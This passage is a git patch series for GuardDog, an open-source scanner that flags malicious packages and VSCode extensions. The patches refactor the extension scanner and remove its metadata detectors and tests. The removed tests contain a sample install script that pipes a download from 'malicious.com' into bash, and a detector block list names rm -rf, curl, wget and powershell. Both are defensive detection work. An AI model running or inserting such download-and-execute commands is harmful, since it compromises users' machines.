vsix_url def _extract_manifest_metadata(self, extracted_path: str) -> dict: """Extract metadata from the extension's package.json manifest""" - + log.debug(f"Starting manifest extraction from: {extracted_path}") - + package_json_path = None for root, dirs, files in os.walk(extracted_path): if "package.json" in files: package_json_path = os.path.join(root, "package.json") break - + if package_json_path is None: 
log.warning(f"No package.json found in {extracted_path}") return {} - + log.debug(f"Found package.json at: {package_json_path}") try: with open(package_json_path, 'r', encoding='utf-8') as f: manifest_data = json.load(f) - log.debug(f"Successfully parsed package.json with {len(manifest_data)} keys") + log.debug( + f"Successfully parsed package.json with {len(manifest_data)} keys") except (json.JSONDecodeError, IOError) as e: - log.warning(f"Failed to read manifest from {package_json_path}: {e}") + log.warning( + f"Failed to read manifest from {package_json_path}: {e}") return {} - - registered_commands = manifest_data.get("contributes", {}).get("commands", []) + + registered_commands = manifest_data.get( + "contributes", {}).get("commands", []) extracted_metadata = { "name": manifest_data.get("name", ""), "displayName": manifest_data.get("displayName", ""), @@ -166,31 +183,37 @@ def _extract_manifest_metadata(self, extracted_path: str) -> dict: "categories": manifest_data.get("categories", []), "registeredCommands": registered_commands, } - + log.debug(f"Extracted manifest metadata: {extracted_metadata}") return extracted_metadata - - def scan_local(self, path: str, rules=None) -> dict: + def scan_local(self, path: str, rules=None, callback: typing.Callable[[dict], None] = noop) -> dict: """ Scan a local VSCode extension directory - + Args: path: Path to extension directory containing package.json rules: Set of rules to use - + callback: Callback to apply to analyzer output + Returns: Scan results """ # Extract manifest metadata from the extension directory manifest_metadata = self._extract_manifest_metadata(path) - + # For local directory scanning, only use manifest metadata package_info = { "marketplace": {}, # Empty for local scans "manifest": manifest_metadata, "source": "local" } - - # Use the analyzer to scan the directory with the package info - return self.analyzer.analyze(path, package_info, rules) + + if rules is not None: + rules = set(rules) + + # Use 
full analyze method to include both metadata and sourcecode analysis + results = self.analyzer.analyze(path, package_info, rules) + callback(results) + + return results diff --git a/tests/analyzer/sourcecode/obfuscation.py b/tests/analyzer/sourcecode/obfuscation.py index 826e12b5..6b63f923 100644 --- a/tests/analyzer/sourcecode/obfuscation.py +++ b/tests/analyzer/sourcecode/obfuscation.py @@ -54,4 +54,4 @@ def f(): # ruleid: obfuscation exec(''.join(chr(c) for c in [112, 114, 105, 110, 116, 40, 34, 72, 101, 108, 108, 111, 44, 32, 119, 111, 114, 108, 100, 34, 41])) # ruleid: obfuscation - exec(''.join(map(chr, [112, 114, 105, 110, 116, 40, 34, 72, 101, 108, 108, 111, 44, 32, 119, 111, 114, 108, 100, 34, 41]))) + exec(''.join(map(chr, [112, 114, 105, 110, 116, 40, 34, 72, 101, 108, 108, 111, 44, 32, 119, 111, 114, 108, 100, 34, 41]))) \ No newline at end of file From 8e2cd4a6e712f7e44468ad2fb4d809324c8fb000 Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Thu, 17 Jul 2025 18:03:24 +0200 Subject: [PATCH 3/7] Remove metadata rules for now, default yara rules to all ecosystems, fix formatting :) --- README.md | 44 +-- guarddog/analyzer/analyzer.py | 84 ++--- guarddog/analyzer/metadata/__init__.py | 3 +- .../analyzer/metadata/extension/__init__.py | 18 -- .../metadata/extension/empty_information.py | 47 --- .../extension/suspicious_permissions.py | 132 -------- .../extension/suspicious_publisher.py | 71 ----- guarddog/analyzer/sourcecode/__init__.py | 28 +- .../extension_obfuscator_dot_io.yar | 30 -- guarddog/reporters/human_readable.py | 8 +- .../metadata/test_extension_metadata.py | 291 ------------------ 11 files changed, 45 insertions(+), 711 deletions(-) delete mode 100644 guarddog/analyzer/metadata/extension/__init__.py delete mode 100644 guarddog/analyzer/metadata/extension/empty_information.py delete mode 100644 guarddog/analyzer/metadata/extension/suspicious_permissions.py delete mode 100644 guarddog/analyzer/metadata/extension/suspicious_publisher.py delete 
mode 100644 guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar delete mode 100644 tests/analyzer/metadata/test_extension_metadata.py diff --git a/README.md b/README.md index c648f122..c4becf0c 100644 --- a/README.md +++ b/README.md @@ -6,9 +6,9 @@ GuardDog

-GuardDog is a CLI tool that allows to identify malicious PyPI and npm packages, Go modules, or VSCode extensions. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata. +GuardDog is a CLI tool that allows to identify malicious PyPI and npm packages, Go modules, GitHub actions, or VSCode extensions. It runs a set of heuristics on the package source code (through Semgrep rules) and on the package metadata. -GuardDog can be used to scan local or remote PyPI and npm packages, Go modules, or VSCode extensions using any of the available [heuristics](#heuristics). +GuardDog can be used to scan local or remote PyPI and npm packages, Go modules, GitHub actions, or VSCode extensions using any of the available [heuristics](#heuristics). It downloads and scans code from: @@ -173,9 +173,9 @@ Source code heuristics: | **Heuristic** | **Description** | |:-------------:|:---------------:| | shady-links | Identify when a package contains an URL to a domain with a suspicious extension | -| go-exec-base64 | Identify Base64-decoded content being passed to execution functions | -| go-exec-download | Identify Go code that downloads potentially executable files | -| go-exfiltrate-sensitive-data | Identify Go code that reads and exfiltrates sensitive| +| go-exec-base64 | Identify Base64-decoded content being passed to execution functions in Go | +| go-exfiltrate-sensitive-data | This rule identifies when a package reads and exfiltrates sensitive data from the local system. | +| go-exec-download | This rule downloads and executes a remote binary after setting executable permissions. | Metadata heuristics: @@ -186,9 +186,6 @@ Metadata heuristics: ### GitHub Action -For GitHub Actions that are implemented in JavaScript, -GuardDog will run the same source code heuristics as for npm packages. 
- Source code heuristics: | **Heuristic** | **Description** | @@ -202,37 +199,6 @@ Source code heuristics: | npm-steganography | Identify when a package retrieves hidden data from an image and executes it | | npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL | | npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system | - - -### VSCode Extensions - -For VSCode extensions that are implemented in JavaScript/TypeScript, -GuardDog will run the same source code heuristics as for npm packages, plus specialized YARA rules. - -Source code heuristics: - -| **Heuristic** | **Description** | -|:-------------:|:---------------:| -| npm-serialize-environment | Identify when a package serializes 'process.env' to exfiltrate environment variables | -| npm-obfuscation | Identify when a package uses a common obfuscation method often used by malware | -| npm-silent-process-execution | Identify when a package silently executes an executable | -| shady-links | Identify when a package contains an URL to a domain with a suspicious extension | -| npm-exec-base64 | Identify when a package dynamically executes code through 'eval' | -| npm-install-script | Identify when a package has a pre or post-install script automatically running commands | -| npm-steganography | Identify when a package retrieves hidden data from an image and executes it | -| npm-dll-hijacking | Identifies when a malicious package manipulates a trusted application into loading a malicious DLL | -| npm-exfiltrate-sensitive-data | Identify when a package reads and exfiltrates sensitive data from the local system | -| extension_obfuscator_dot_io | Detect usage of obfuscator.io service patterns | -| extension_powershell_policy_bypass | Identify PowerShell execution policy bypass attempts | -| extension_suspicious_passwd_access_linux | Detect suspicious access to Linux password files | - -Metadata 
heuristics: - -| **Heuristic** | **Description** | -|:-------------:|:---------------:| -| empty_information | Identify extensions with an empty description field | -| suspicious-permissions | Identify extensions with potentially dangerous permissions or suspicious characteristics | -| suspicious-publisher | Identify extensions with suspicious publisher verification status and typosquatting | ## Custom Rules diff --git a/guarddog/analyzer/analyzer.py b/guarddog/analyzer/analyzer.py index 5c88e6b1..d4b9c2df 100644 --- a/guarddog/analyzer/analyzer.py +++ b/guarddog/analyzer/analyzer.py @@ -93,8 +93,7 @@ def analyze( sourcecode_results = None # populate results, errors, and number of issues - metadata_results = self.analyze_metadata( - path, info, rules, name, version) + metadata_results = self.analyze_metadata(path, info, rules, name, version) sourcecode_results = self.analyze_sourcecode(path, rules) # Concatenate dictionaries together @@ -102,16 +101,11 @@ def analyze( results = metadata_results["results"] | sourcecode_results["results"] errors = metadata_results["errors"] | sourcecode_results["errors"] - output = { + return { "issues": issues, "errors": errors, "results": results, "path": path} - # Including extension info - pending discussion - # if info is not None: - # output["package_info"] = info - - return output def analyze_metadata( self, @@ -148,8 +142,7 @@ def analyze_metadata( for rule in all_rules: try: log.debug(f"Running rule {rule} against package '{name}'") - rule_matches, message = self.metadata_detectors[rule].detect( - info, path, name, version) + rule_matches, message = self.metadata_detectors[rule].detect(info, path, name, version) results[rule] = None if rule_matches: issues += 1 @@ -209,11 +202,6 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: rule_results: defaultdict[dict, list[dict]] = defaultdict(list) - # Define verbose rules that should only show "file-level" triggers - verbose_rules = { - 
"DETECT_FILE_obfuscator_dot_io", - } - rules_path = { rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yar") for rule_name in all_rules @@ -233,54 +221,32 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: continue scan_file_target_abspath = os.path.join(root, f) - scan_file_target_relpath = os.path.relpath( - scan_file_target_abspath, path) + scan_file_target_relpath = os.path.relpath(scan_file_target_abspath, path) matches = scan_rules.match(scan_file_target_abspath) for m in matches: rule_name = m.rule - if rule_name in verbose_rules: - # For verbose rules, we only show that the rule was triggered in the matching file - # We're logging appearances once instead of - # issue-counting - file_already_reported = any( - finding["location"].startswith(scan_file_target_relpath + ":") - for finding in rule_results[rule_name] - ) - - if not file_already_reported: + for s in m.strings: + for i in s.instances: finding = { - "location": f"{scan_file_target_relpath}:1", - "code": f'{"Rule triggered in file (matches hidden for brevity)"}', - 'message': m.meta.get( - "description", - f"{rule_name} rule matched")} - issues += 1 + "location": f"{scan_file_target_relpath}:{i.offset}", + "code": self.trim_code_snippet(str(i.matched_data)), + 'message': m.meta.get("description", f"{rule_name} rule matched") + } + + # since yara can match the multiple times in the same file + # leading to finding several times the same word or pattern + # this dedup the matches + if [ + f + for f in rule_results[rule_name] + if finding["code"] == f["code"] + ]: + continue + + issues += len(m.strings) rule_results[rule_name].append(finding) - else: - # For non-verbose rules, show detailed matches as - # before - for s in m.strings: - for i in s.instances: - finding = { - "location": f"{scan_file_target_relpath}:{i.offset}", - "code": self.trim_code_snippet(str(i.matched_data)), - 'message': m.meta.get("description", f"{rule_name} rule matched") - } - - # since yara 
can match the multiple times in the same file - # leading to finding several times the same word or pattern - # this dedup the matches - if [ - f - for f in rule_results[rule_name] - if finding["code"] == f["code"] - ]: - continue - - issues += len(m.strings) - rule_results[rule_name].append(finding) except Exception as e: errors["rules-all"] = f"failed to run rule: {str(e)}" @@ -312,8 +278,7 @@ def analyze_semgrep(self, path, rules=None) -> dict: errors = {} issues = 0 - rules_path = list(map(lambda rule_name: os.path.join( - SOURCECODE_RULES_PATH, f"{rule_name}.yml"), all_rules)) + rules_path = list(map(lambda rule_name: os.path.join(SOURCECODE_RULES_PATH, f"{rule_name}.yml"), all_rules)) if len(rules_path) == 0: log.debug("No semgrep code rules to run") @@ -322,8 +287,7 @@ def analyze_semgrep(self, path, rules=None) -> dict: try: log.debug(f"Running semgrep code rules against {path}") response = self._invoke_semgrep(target=path, rules=rules_path) - rule_results = self._format_semgrep_response( - response, targetpath=targetpath) + rule_results = self._format_semgrep_response(response, targetpath=targetpath) issues += sum(len(res) for res in rule_results.values()) results = results | rule_results diff --git a/guarddog/analyzer/metadata/__init__.py b/guarddog/analyzer/metadata/__init__.py index 08f20894..8f2686ac 100644 --- a/guarddog/analyzer/metadata/__init__.py +++ b/guarddog/analyzer/metadata/__init__.py @@ -3,7 +3,6 @@ from guarddog.analyzer.metadata.pypi import PYPI_METADATA_RULES from guarddog.analyzer.metadata.go import GO_METADATA_RULES from guarddog.analyzer.metadata.github_action import GITHUB_ACTION_METADATA_RULES -from guarddog.analyzer.metadata.extension import EXTENSION_METADATA_RULES from guarddog.ecosystems import ECOSYSTEM @@ -18,4 +17,4 @@ def get_metadata_detectors(ecosystem: ECOSYSTEM) -> dict[str, Detector]: case ECOSYSTEM.GITHUB_ACTION: return GITHUB_ACTION_METADATA_RULES case ECOSYSTEM.EXTENSION: - return EXTENSION_METADATA_RULES + return {} 
# No metadata detectors for extensions currently diff --git a/guarddog/analyzer/metadata/extension/__init__.py b/guarddog/analyzer/metadata/extension/__init__.py deleted file mode 100644 index d47b7801..00000000 --- a/guarddog/analyzer/metadata/extension/__init__.py +++ /dev/null @@ -1,18 +0,0 @@ -from typing import Type - -from guarddog.analyzer.metadata import Detector -from guarddog.analyzer.metadata.extension.empty_information import ExtensionEmptyInfoDetector -from guarddog.analyzer.metadata.extension.suspicious_publisher import ExtensionSuspiciousPublisherDetector -from guarddog.analyzer.metadata.extension.suspicious_permissions import ExtensionSuspiciousPermissionsDetector - -EXTENSION_METADATA_RULES = {} - -classes: list[Type[Detector]] = [ - ExtensionEmptyInfoDetector, - ExtensionSuspiciousPublisherDetector, - ExtensionSuspiciousPermissionsDetector, -] - -for detectorClass in classes: - detectorInstance = detectorClass() # type: ignore - EXTENSION_METADATA_RULES[detectorInstance.get_name()] = detectorInstance diff --git a/guarddog/analyzer/metadata/extension/empty_information.py b/guarddog/analyzer/metadata/extension/empty_information.py deleted file mode 100644 index 3a2fc7e4..00000000 --- a/guarddog/analyzer/metadata/extension/empty_information.py +++ /dev/null @@ -1,47 +0,0 @@ -""" Empty Information Detector for Extensions - -Detects if an extension contains an empty description -""" -import logging -from typing import Optional - -from guarddog.analyzer.metadata.empty_information import EmptyInfoDetector - -log = logging.getLogger("guarddog") - - -class ExtensionEmptyInfoDetector(EmptyInfoDetector): - """Detects extensions with empty description information""" - - def detect(self, - package_info, - path: Optional[str] = None, - name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, - str]: - - log.debug( - f"Running extension empty description heuristic on extension {name} version {version}") - - if not package_info or not 
isinstance(package_info, dict): - return True, "Extension has no package information" - - manifest = package_info.get("manifest", {}) - marketplace = package_info.get("marketplace", {}) - source = package_info.get("source", "unknown") - - return self._detect_with_metadata(manifest, marketplace, source) - - def _detect_with_metadata(self, - manifest: dict, - marketplace: dict, - source: str) -> tuple[bool, - str]: - """Detect empty information with pre-extracted metadata""" - - manifest_description = manifest.get("description", "").strip() - manifest_display_name = manifest.get("displayName", "").strip() - - if not manifest_description and not manifest_display_name: - return True, self.MESSAGE_TEMPLATE % "Extension Marketplace (manifest)" - return False, "" diff --git a/guarddog/analyzer/metadata/extension/suspicious_permissions.py b/guarddog/analyzer/metadata/extension/suspicious_permissions.py deleted file mode 100644 index b94cf7af..00000000 --- a/guarddog/analyzer/metadata/extension/suspicious_permissions.py +++ /dev/null @@ -1,132 +0,0 @@ -from typing import Optional - -from guarddog.analyzer.metadata.detector import Detector - - -class ExtensionSuspiciousPermissionsDetector(Detector): - """Detects extensions with suspicious permissions or capabilities""" - - def __init__(self): - super().__init__(name="suspicious-permissions", - description="Identify extensions with potentially" - "dangerous permissions or suspicious characteristics") - - def detect(self, - package_info, - path: Optional[str] = None, - name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, - Optional[str]]: - - if not package_info or not isinstance(package_info, dict): - return False, None - - manifest = package_info.get("manifest", {}) - marketplace = package_info.get("marketplace", {}) - source = package_info.get("source", "unknown") - - return self._detect_with_metadata(manifest, marketplace, source) - - def _detect_with_metadata(self, - manifest: dict, - marketplace: 
dict, - source: str) -> tuple[bool, - Optional[str]]: - - # Check manifest for suspicious activation events - activation_events = manifest.get("activationEvents", []) - suspicious_activations = [] - - for event in activation_events: - if isinstance(event, str): - # Very broad activation events that could be suspicious - if event == "*": - suspicious_activations.append(event) - elif "onFileSystem:" in event and "*" in event: - suspicious_activations.append(event) - - if suspicious_activations: - return True, f"Extension uses suspicious activation events: {', '.join(suspicious_activations)}" - - # Check for suspicious scripts in manifest - scripts = manifest.get("scripts", {}) - if scripts: - suspicious_script_patterns = [ - 'rm -rf', - 'del /s', - 'format', - 'shutdown', - 'curl', - 'wget', - 'powershell'] - for script_name, script_content in scripts.items(): - if isinstance(script_content, str): - for pattern in suspicious_script_patterns: - if pattern in script_content.lower(): - return True, f"Extension has suspicious script '{script_name}': contains '{pattern}'" - - dependencies = manifest.get("dependencies", {}) - dev_dependencies = manifest.get("devDependencies", {}) - all_deps = {**dependencies, **dev_dependencies} - - # The list is NOT exhaustive, adjust as needed - suspicious_deps = ['child_process', 'fs-extra', 'shelljs', 'node-pty'] - found_suspicious_deps = [ - dep for dep in all_deps.keys() if any( - sus in dep for sus in suspicious_deps)] - - if found_suspicious_deps: - return True, f"Extension uses potentially dangerous dependencies: {', '.join(found_suspicious_deps[:3])}" - - if marketplace and source == "remote": - download_count = marketplace.get("download_count", 0) - # Check if publisher is not verified but has high privileges - publisher_info = marketplace.get("publisher", {}) - if isinstance(publisher_info, dict): - flags = publisher_info.get("flags", []) - is_verified = any("verified" in str(flag).lower() - for flag in flags) if flags else 
False - is_domain_verified = marketplace.get( - "publisher_isDomainVerified", False) - - # Suspicious: unverified publisher with low download count - if not is_verified and not is_domain_verified and download_count < 1000: - return True, "Extension from unverified publisher with low download count" - - if flags: - flag_strings = [str(flag).lower() for flag in flags] - # malware might unnecessary since extensions are swiftly - # removed from the marketplace - suspicious_flag_patterns = [ - 'preview', 'deprecated', 'malware'] - found_suspicious_flags = [ - flag for flag in flag_strings if any( - pattern in flag for pattern in suspicious_flag_patterns)] - if found_suspicious_flags: - return True, f"Extension has suspicious marketplace flags: {', '.join(found_suspicious_flags)}" - - contributes = manifest.get("contributes", {}) - if contributes: - # Check for dangerous contribution points - if contributes.get("terminal"): - return True, "Extension contributes terminal functionality which could be dangerous" - - if contributes.get("taskDefinitions"): - return True, "Extension contributes task definitions which could execute arbitrary commands" - - # Will add typosquatting checks for most used commands - - # Check categories for suspicious types - categories = manifest.get("categories", []) - if categories: - suspicious_categories = [ - 'debuggers', 'other', 'testing', 'snippets'] - category_strings = [str(cat).lower() for cat in categories] - found_suspicious_cats = [ - cat for cat in category_strings if any( - sus in cat for sus in suspicious_categories)] - if found_suspicious_cats and len(categories) == 1: - # Only flag if it's the sole category - return True, f"Extension has potentially suspicious sole category: {found_suspicious_cats[0]}" - - return False, None diff --git a/guarddog/analyzer/metadata/extension/suspicious_publisher.py b/guarddog/analyzer/metadata/extension/suspicious_publisher.py deleted file mode 100644 index 8fc82109..00000000 --- 
a/guarddog/analyzer/metadata/extension/suspicious_publisher.py +++ /dev/null @@ -1,71 +0,0 @@ -from typing import Optional - -from guarddog.analyzer.metadata.detector import Detector - - -class ExtensionSuspiciousPublisherDetector(Detector): - """Detects extensions with suspicious publisher characteristics""" - - def __init__(self): - super().__init__(name="suspicious-publisher", - description="Identify extensions with suspicious" - "publisher verification status and typosquatting") - - def detect(self, - package_info, - path: Optional[str] = None, - name: Optional[str] = None, - version: Optional[str] = None) -> tuple[bool, - Optional[str]]: - - if not package_info or not isinstance(package_info, dict): - return False, None - - manifest = package_info.get("manifest", {}) - marketplace = package_info.get("marketplace", {}) - source = package_info.get("source", "unknown") - - return self._detect_with_metadata( - manifest, marketplace, source, package_info) - - def _detect_with_metadata(self, - manifest: dict, - marketplace: dict, - source: str, - package_info: dict) -> tuple[bool, - Optional[str]]: - """Detect suspicious publisher patterns with pre-extracted metadata""" - - manifest_publisher = manifest.get("publisher", "").strip() - - if not manifest_publisher: - return False, None # Already handled by empty-information detector - - # TODO: Check for typosquatting using the dedicated detector - - verification_info = [] - if marketplace and source == "remote": - publisher_info = marketplace.get("publisher", {}) - - if isinstance(publisher_info, dict): - # Check if publisher is verified (positive information) - flags = publisher_info.get("flags", []) - is_verified = any("verified" in str(flag).lower() - for flag in flags) if flags else False - - if is_verified: - verification_info.append("Publisher is verified") - - # Check if publisher domain is verified (positive information) - is_domain_verified = marketplace.get( - "publisher_isDomainVerified", False) - if 
is_domain_verified: - verification_info.append("Publisher domain is verified") - - # If we have positive verification information, include it in a non-suspicious way - # This doesn't return True (not suspicious) but provides information - # until more robust heuristics are implemented - if verification_info: - pass - - return False, None diff --git a/guarddog/analyzer/sourcecode/__init__.py b/guarddog/analyzer/sourcecode/__init__.py index 72918c1d..ad00f8aa 100644 --- a/guarddog/analyzer/sourcecode/__init__.py +++ b/guarddog/analyzer/sourcecode/__init__.py @@ -99,11 +99,7 @@ def get_sourcecode_rules( SempgrepRule( id=rule["id"], ecosystem=ecosystem, - description=rule.get( - "metadata", - {}).get( - "description", - ""), + description=rule.get("metadata", {}).get("description", ""), file=file_name, rule_content=rule, )) @@ -117,18 +113,22 @@ def get_sourcecode_rules( rule_id = pathlib.Path(file_name).stem description_regex = fr'\s*rule\s+{rule_id}[^}}]+meta:[^}}]+description\s*=\s*\"(.+?)\"' - # Default to EXTENSION for general YARA rules (can be adjusted as when - # other ecosystems are supported) - rule_ecosystem = ECOSYSTEM.EXTENSION + rule_ecosystems = [] + if file_name.startswith("extension_"): + rule_ecosystems = [ECOSYSTEM.EXTENSION] + else: + # If no specific ecosystem prefix, default to all ecosystems + rule_ecosystems = [ECOSYSTEM.PYPI, ECOSYSTEM.NPM, ECOSYSTEM.GO, ECOSYSTEM.GITHUB_ACTION, ECOSYSTEM.EXTENSION] with open(os.path.join(current_dir, file_name), "r") as fd: match = re.search(description_regex, fd.read()) rule_description = "" if match: rule_description = match.group(1) - SOURCECODE_RULES.append(YaraRule( - id=rule_id, - file=file_name, - description=rule_description, - ecosystem=rule_ecosystem - )) + for ecosystem in rule_ecosystems: + SOURCECODE_RULES.append(YaraRule( + id=rule_id, + file=file_name, + description=rule_description, + ecosystem=ecosystem + )) diff --git a/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar 
b/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar deleted file mode 100644 index f66cc1a7..00000000 --- a/guarddog/analyzer/sourcecode/extension_obfuscator_dot_io.yar +++ /dev/null @@ -1,30 +0,0 @@ -rule DETECT_FILE_obfuscator_dot_io -{ - meta: - - author = "T HAMDOUNI, Datadog" - description = "Detects Javascript code obfuscated with obfuscator.io. Note that although malicious code is often obfuscated, there are legitimate use cases including protecting intellectual property or preventing reverse engineering." - - strings: - $id1 = /(^|[^A-Za-z0-9])_0x[a-f0-9]{4,8}/ ascii - $id2 = /(^|[^A-Za-z0-9])a0_0x[a-f0-9]{4,8}/ ascii - - $rot_push = "['push'](_0x" ascii - $rot_shift = "['shift']()" ascii - $loop1 = /while\s*\(\!\!\[\]\)/ - - $def1 = "Function('return\\x20(function()\\x20'+'{}.constructor(\\x22return\\x20this\\x22)(" ascii - $def2 = "{}.constructor(\"return this\")(" ascii - $def3 = "{}.constructor(\\x22return\\x20this\\x22)(\\x20)" base64 - - $tok2 = /parseInt\(_0x[a-f0-9]{4,8}\(0x[a-f0-9]+\)\)/ ascii nocase // strong indicator - - condition: - filesize < 5MB and - ( - ( (#id1 + #id2) >= 6 ) or - ( ( $rot_push and $rot_shift ) or $loop1 ) or - ( any of ($def*) or #tok2 > 5 ) - ) - -} diff --git a/guarddog/reporters/human_readable.py b/guarddog/reporters/human_readable.py index 9cd59ce6..dd519a3d 100644 --- a/guarddog/reporters/human_readable.py +++ b/guarddog/reporters/human_readable.py @@ -74,13 +74,7 @@ def _format_code_line_for_output(code) -> str: for finding in findings: description = findings[finding] if isinstance(description, str): # package metadata - lines.append( - colored( - finding, - None, - attrs=["bold"]) - + ": " - + description) + lines.append(colored(finding, None, attrs=["bold"]) + ": " + description) lines.append("") elif isinstance(description, list): # semgrep rule result: source_code_findings = description diff --git a/tests/analyzer/metadata/test_extension_metadata.py b/tests/analyzer/metadata/test_extension_metadata.py 
deleted file mode 100644 index b22d74b5..00000000 --- a/tests/analyzer/metadata/test_extension_metadata.py +++ /dev/null @@ -1,291 +0,0 @@ -import pytest - -from guarddog.analyzer.metadata.extension.empty_information import ExtensionEmptyInfoDetector -from guarddog.analyzer.metadata.extension.suspicious_permissions import ExtensionSuspiciousPermissionsDetector -from guarddog.analyzer.metadata.extension.suspicious_publisher import ExtensionSuspiciousPublisherDetector - - -class TestExtensionEmptyInfoDetector: - detector = ExtensionEmptyInfoDetector() - - def test_no_package_info(self): - matches, message = self.detector.detect(None) - assert matches - assert "no package information" in message - - def test_empty_manifest(self): - package_info = { - "manifest": { - "name": "test-extension", - "description": "", - "displayName": "" - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert "Extension Marketplace (manifest)" in message - - def test_non_empty_manifest_local(self): - package_info = { - "manifest": { - "name": "test-extension", - "description": "A useful extension", - "displayName": "Test Extension" - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches - - -class TestExtensionSuspiciousPermissionsDetector: - detector = ExtensionSuspiciousPermissionsDetector() - - def test_no_package_info(self): - matches, message = self.detector.detect(None) - assert not matches - assert message is None - - def test_wildcard_activation_event(self): - package_info = { - "manifest": { - "activationEvents": ["*"] - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "suspicious activation events" in message - assert "*" in message - - def test_suspicious_filesystem_activation(self): - package_info = { - "manifest": { - 
"activationEvents": ["onFileSystem:*"] - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "suspicious activation events" in message - assert "onFileSystem:*" in message - - def test_safe_activation_events(self): - package_info = { - "manifest": { - "activationEvents": ["onCommand:myextension.hello", "onLanguage:python"] - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches - - def test_suspicious_script_rm_rf(self): - package_info = { - "manifest": { - "scripts": { - "postinstall": "rm -rf /tmp/something" - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "suspicious script" in message - assert "rm -rf" in message - - def test_suspicious_script_curl(self): - package_info = { - "manifest": { - "scripts": { - "install": "curl http://malicious.com/script.sh | bash" - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "suspicious script" in message - assert "curl" in message - - def test_safe_scripts(self): - package_info = { - "manifest": { - "scripts": { - "compile": "tsc", - "test": "mocha" - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches - - def test_suspicious_dependencies(self): - package_info = { - "manifest": { - "dependencies": { - "child_process": "^1.0.0", - "lodash": "^4.0.0" - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "dangerous dependencies" in message - assert "child_process" in message - - def test_safe_dependencies(self): - package_info = { - 
"manifest": { - "dependencies": { - "lodash": "^4.0.0", - "axios": "^0.21.0" - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches - - def test_unverified_publisher_low_downloads(self): - package_info = { - "manifest": {}, - "marketplace": { - "download_count": 500, - "publisher": { - "flags": [] - }, - "publisher_isDomainVerified": False - }, - "source": "remote" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "unverified publisher" in message - assert "low download count" in message - - def test_verified_publisher_high_downloads(self): - package_info = { - "manifest": {}, - "marketplace": { - "download_count": 100000, - "publisher": { - "flags": ["verified"] - }, - "publisher_isDomainVerified": True - }, - "source": "remote" - } - matches, message = self.detector.detect(package_info) - assert not matches - - def test_terminal_contribution(self): - package_info = { - "manifest": { - "contributes": { - "terminal": { - "profiles": ["custom-terminal"] - } - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "terminal functionality" in message - - def test_task_definitions_contribution(self): - package_info = { - "manifest": { - "contributes": { - "taskDefinitions": [ - { - "type": "custom-task" - } - ] - } - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "task definitions" in message - - - def test_suspicious_sole_category(self): - package_info = { - "manifest": { - "categories": ["Debuggers"] - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert matches - assert message is not None - assert "suspicious sole category" in message - assert 
"debuggers" in message - - def test_multiple_categories_with_suspicious(self): - package_info = { - "manifest": { - "categories": ["Debuggers", "Machine Learning", "Testing"] - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches # Should not flag because multiple categories - -class TestExtensionSuspiciousPublisherDetector: - detector = ExtensionSuspiciousPublisherDetector() - - def test_no_package_info(self): - matches, message = self.detector.detect(None) - assert not matches - assert message is None - - def test_empty_publisher(self): - package_info = { - "manifest": { - "publisher": "" - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches # Handled by empty-information detector - - def test_valid_publisher_local(self): - package_info = { - "manifest": { - "publisher": "microsoft" - }, - "marketplace": {}, - "source": "local" - } - matches, message = self.detector.detect(package_info) - assert not matches From 2564a615804ce9f3c0fe50f78d36fd1014e055fb Mon Sep 17 00:00:00 2001 From: tesnim5hamdouni Date: Fri, 18 Jul 2025 15:43:53 +0200 Subject: [PATCH 4/7] nits ... 
--- guarddog/analyzer/analyzer.py | 20 +++------ guarddog/analyzer/sourcecode/__init__.py | 30 ++++++------- guarddog/scanners/extension_scanner.py | 55 +++++++++++------------- 3 files changed, 47 insertions(+), 58 deletions(-) diff --git a/guarddog/analyzer/analyzer.py b/guarddog/analyzer/analyzer.py index d4b9c2df..7d294bac 100644 --- a/guarddog/analyzer/analyzer.py +++ b/guarddog/analyzer/analyzer.py @@ -225,14 +225,13 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: matches = scan_rules.match(scan_file_target_abspath) for m in matches: - rule_name = m.rule for s in m.strings: for i in s.instances: finding = { "location": f"{scan_file_target_relpath}:{i.offset}", "code": self.trim_code_snippet(str(i.matched_data)), - 'message': m.meta.get("description", f"{rule_name} rule matched") + 'message': m.meta.get("description", f"{m.rule} rule matched") } # since yara can match the multiple times in the same file @@ -240,13 +239,13 @@ def analyze_yara(self, path: str, rules: Optional[set] = None) -> dict: # this dedup the matches if [ f - for f in rule_results[rule_name] + for f in rule_results[m.rule] if finding["code"] == f["code"] ]: continue issues += 